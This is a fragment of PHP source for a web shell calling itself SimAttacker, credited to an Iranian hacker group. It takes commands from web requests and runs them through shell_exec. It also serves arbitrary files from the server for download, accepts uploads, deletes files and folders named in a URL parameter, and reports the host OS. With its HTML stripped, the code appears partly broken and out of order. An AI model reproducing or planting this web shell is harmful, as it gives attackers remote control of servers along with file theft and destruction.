//download Files Code $fdownload=$_GET['fdownload']; if ($fdownload <> "" ){ // path & file name $path_parts = pathinfo("$fdownload"); $entrypath=$path_parts["basename"]; $name = "$fdownload"; $fp = fopen($name, 'rb'); header("Content-Disposition: attachment; filename=$entrypath"); header("Content-Length: " . filesize($name)); fpassthru($fp); exit; } ?>
CMD Shell
|
//*******************************************************
//Start Programs About US
$id=$_GET['id'];
if ($id=="") {
echo "
*************************************************************************** Iranian Hackers : WWW.SIMORGH-EV.COM Programer : Hossein Asgary Note : SimAttacker Have copyright from simorgh security Group please : If you find bug or problems in program , tell me by : e-mail : admin(at)simorgh-ev(dot)com Enjoy :) [Only 4 Best Friends ] *************************************************************************** "; echo "OS :". php_uname(); echo " IP :". ($_SERVER['REMOTE_ADDR']); echo ""; } //************************************************************ //cmd-command line $cmd=$_POST['cmd']; if($id=="cmd"){ $result=shell_exec("$cmd"); echo " CMD ExeCuteYour IP & BindPort: Home: $homedir
"; if (move_uploaded_file($_FILES['userfile']['tmp_name'], $uploadfile)) { echo ""; echo ""; } } //file deleted $frpath=$_GET['fdelete']; if ($frpath <> "") { if (is_dir($frpath)){ $matches = glob($frpath . '/*.*'); if ( is_array ( $matches ) ) { foreach ( $matches as $filename) { unlink ($filename); rmdir("$frpath"); echo ""; echo ""; } } } else{ echo ""; unlink ("$frpath"); echo ""; exit(0); } } ?> |
||||||||||||
|